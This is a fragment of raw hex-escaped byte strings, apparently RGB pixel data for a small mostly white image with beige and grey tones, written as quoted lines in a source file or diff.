-"\xfa\xf8\xf4\xeb\xdf\xf2\xe9\xdb\xf7\xf1\xe9\xf9\xf6\xf0\xfe\xfd" -"\xfd\xfd\xfc\xfb\xf7\xf1\xe8\xec\xdb\xc4\xe2\xc9\xa6\xf1\xe6\xd6" -"\xfe\xfe\xfe\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfb\xf9\xf5\xeb\xda\xc2\xe0\xc5\xa0\xfd\xfc" -"\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf4\xea\xdd" -"\xe4\xcc\xab\xe3\xcb\xa9\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xfe" -"\xfe\xfe\xfc\xfb\xf8\xf5\xed\xe1\xe2\xc8\xa4\xe3\xcb\xa9\xed\xde" -"\xc9\xfd\xfc\xfb\xfe\xfe\xfe\xfe\xfe\xfe\xfb\xf9\xf6\xfe\xfe\xfe" -"\xf7\xf1\xe9\xf9\xf4\xed\xfa\xf6\xf0\xf8\xf3\xec\xfe\xfe\xfe\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xfe\xfd\xfd\xfd\xfb\xfa\xf3\xeb\xde\xf3\xea\xdd\xfa\xf7" -"\xf3\xfa\xf7\xf2\xfe\xfe\xfd\xfe\xfd\xfd\xef\xe2\xcf\xdb\xbc\x92" -"\xd3\xab\x74\xf4\xea\xde\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfb\xf9\xee\xdf\xcb\xed\xde" -"\xc9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf6\xf0\xe1\xc6\xa2" -"\xea\xd8\xbf\xf9\xf5\xee\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf1" -"\xe5\xd5\xe6\xd0\xb2\xe1\xc7\xa3\xf1\xe5\xd6\xfb\xf7\xf3\xfe\xfe" -"\xfd\xfe\xfd\xfc\xfb\xf9\xf5\xfc\xfa\xf8\xf0\xe4\xd4\xf8\xf2\xeb" -"\xfc\xfa\xf7\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfd\xfb\xf9\xfb\xf9" -"\xf6\xf2\xe9\xdd\xfa\xf7\xf3\xf8\xf2\xeb\xfe\xfe\xfd\xff\xff\xff" -"\xfb\xf7\xf2\xe1\xc7\xa3\xe5\xce\xaf\xf0\xe3\xd2\xfe\xfe\xfd\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe1\xc7" -"\xa3\xeb\xd9\xc1\xfc\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xcf\xb1\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfd\xfc\xfb\xf4\xea\xdd\xe4\xcc\xab\xf2\xe8\xda" -"\xfd\xfc\xfa\xfe\xfe\xfe\xfd\xfc\xfb\xf8\xf2\xeb\xed\xde\xc8\xe2" -"\xc8\xa6\xea\xd7\xbe\xf5\xed\xe2\xfe\xfe\xfe\xfd\xfc\xfb\xfa\xf7" -"\xf3\xf7\xf2\xea\xf1\xe5\xd6\xf8\xf4\xee\xf9\xf5\xf0\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xfb\xf8\xf4\xe9\xd8\xc1" -"\xec\xdd\xc8\xf9\xf4\xee\xfb\xf9\xf5\xf9\xf3\xed\xe4\xcc\xaa\xe1" -"\xc8\xa5\xe9\xd7\xbd\xfc\xfb\xf8\xfe\xfe\xfe\xff\xff\xff\xfe\xfe" -"\xfe\xf8\xf1\xe8\xe4\xcc\xac\xf7\xf0\xe7\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd0\xb2\xfd\xfb\xf9\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc" -"\xfb\xf3\xea\xdc\xe3\xcb\xa9\xf2\xe8\xda\xfd\xfc\xfa\xfa\xf6\xf1" -"\xf0\xe3\xd2\xe5\xce\xaf\xe7\xd1\xb5\xf3\xe8\xd9\xfc\xf9\xf6\xf9" -"\xf5\xf0\xfa\xf8\xf4\xf7\xf2\xeb\xf7\xf2\xeb\xfb\xf9\xf6\xfa\xf7" -"\xf3\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xf1\xe7\xd8\xf4\xed\xe2\xfb\xf8\xf5\xf9\xf4\xee\xf2" -"\xe6\xd7\xe6\xd1\xb3\xe6\xd0\xb2\xf1\xe6\xd6\xfb\xf8\xf3\xff\xff" -"\xff\xff\xff\xff\xf9\xf5\xef\xe3\xc9\xa6\xf4\xeb\xdf\xfe\xfd\xfd" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xeb\xda" -"\xc2\xe1\xc6\xa1\xf9\xf4\xee\xfd\xfc\xfa\xf7\xf1\xe8\xe3\xca\xa8" -"\xe2\xc8\xa5\xea\xd8\xc0\xfb\xf9\xf6\xf9\xf4\xee\xfa\xf7\xf3\xef" -"\xe4\xd3\xf7\xf2\xea\xfb\xf9\xf7\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xfc\xfb\xf8\xfc\xfa\xf7\xf9\xf6\xf1\xf5\xee\xe4\xfb" -"\xf9\xf5\xf7\xf2\xea\xe9\xd6\xbc\xe2\xc8\xa4\xe4\xcc\xaa\xf9\xf4" 
-"\xed\xfe\xfd\xfc\xfe\xfe\xfe\xea\xd8\xbe\xe1\xc7\xa2\xf2\xe6\xd7" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xd1\xb3\xfd\xfc\xfa\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe3\xcb\xab\xe3\xcb" -"\xa9\xf2\xe7\xd9\xf3\xe9\xdc\xe8\xd4\xb9\xe1\xc7\xa4\xef\xe1\xce" -"\xf7\xf1\xe9\xf8\xf3\xec\xf8\xf3\xed\xef\xe3\xd3\xf6\xf0\xe8\xfb" -"\xf9\xf5\xfe\xfd\xfc\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfd\xfb\xf9\xf6\xf9\xf5\xef\xf0\xe4\xd4\xf6\xef\xe6\xec\xdc" -"\xc7\xe4\xcb\xaa\xe0\xc5\xa0\xf3\xe8\xda\xfa\xf6\xf1\xf0\xe3\xd1" -"\xeb\xda\xc2\xfb\xf9\xf5\xfe\xfe\xfe\xe6\xd1\xb3\xfd\xfc\xfa\xfe" -"\xfe\xfe\xf2\xe7\xd9\xd7\xb4\x84\xd7\xb4\x83\xea\xd7\xbe\xe2\xc9" -"\xa6\xe2\xc9\xa6\xf0\xe3\xd2\xf7\xf2\xeb\xf8\xf3\xed\xf7\xf2\xea" -"\xfd\xfb\xf9\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfb\xf8\xf4\xfb\xf9\xf6\xef\xe3" -"\xd3\xf6\xef\xe6\xf2\xe7\xd9\xe1\xc6\xa2\xe4\xcd\xae\xee\xe0\xcd" -"\xe1\xc6\xa2\xe9\xd5\xba\xfa\xf6\xf1\xe6\xd1\xb3\xfc\xfb\xf9\xf9" -"\xf5\xee\xdc\xbe\x95\xec\xdd\xc8\xe6\xd1\xb4\xe3\xcb\xaa\xe7\xd4" -"\xb9\xf3\xea\xde\xf2\xe7\xd8\xf8\xf2\xeb\xfd\xfc\xfa\xfe\xfe\xfd" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfa\xf7" -"\xf3\xfc\xf9\xf6\xf8\xf3\xec\xf0\xe5\xd5\xe9\xd7\xbd\xdf\xc4\x9f" -"\xe3\xca\xa9\xdd\xc0\x98\xe6\xcf\xb2\xe6\xd1\xb3\xf3\xe9\xdb\xe1" -"\xc6\xa1\xd8\xb7\x88\xd3\xaa\x73\xe4\xcc\xab\xf6\xf0\xe7\xf1\xe6" -"\xd7\xf7\xf1\xea\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfa\xfb\xf9\xf6" -"\xfc\xfa\xf7\xfb\xf9\xf5\xfd\xfb\xfa\xfd\xfb\xfa\xfd\xfc\xfa\xfd" -"\xfb\xf9\xf6\xf6\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xf7\xf7\xf8\xf2\xf2\xf2\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf9" -"\xf9\xf2\xf3\xf3\xed\xee\xee\xdb\xdc\xdc\xe3\xe3\xe3\xda\xdb\xdb" -"\xe5\xe5\xe5\xf0\xf0\xf0\xee\xee\xee\xda\xda\xda\xed\xed\xed\xfc" -"\xfc\xfc\xd8\xd8\xd8\xf8\xf8\xf8\xec\xec\xed\xe9\xe9\xe9\xde\xde" -"\xde\xe1\xe1\xe2\xdd\xde\xde\xcf\xd0\xd0\xfa\xfa\xfa\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xed\xed" -"\xed\xd8\xd9\xda\xd2\xd3\xd4\xb0\xb1\xb2\xb5\xb6\xb6\xd1\xd2\xd2" -"\xb4\xb4\xb3\xd1\xd1\xd0\xc9\xc9\xc9\xad\xad\xad\xcc\xcd\xcd\xf5" -"\xf5\xf5\xbf\xbf\xbf\xdf\xdf\xde\x9d\x9d\x9d\xb6\xb7\xb7\xc6\xc7" -"\xc7\xc6\xc7\xc7\xcc\xcc\xcc\xc9\xc9\xca\xf3\xf3\xf3\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xfa" -"\xfa\xea\xea\xea\xe9\xe9\xe9\xe5\xe5\xe5\xec\xec\xec\xe0\xe1\xe1" -"\xdb\xdb\xdb\xe0\xe1\xe0\xe8\xe8\xe8\xe1\xe1\xe1\xf1\xf1\xf1\xfd" -"\xfd\xfd\xd5\xd5\xd5\xec\xec\xec\xf4\xf4\xf4\xf1\xf1\xf1\xe4\xe4" -"\xe4\xe7\xe7\xe6\xc8\xc9\xc9\xd7\xd7\xd7\xf9\xf9\xf9\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" -"\xfe\xfe\xf7\xf7\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xf5\xf5\xf5\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
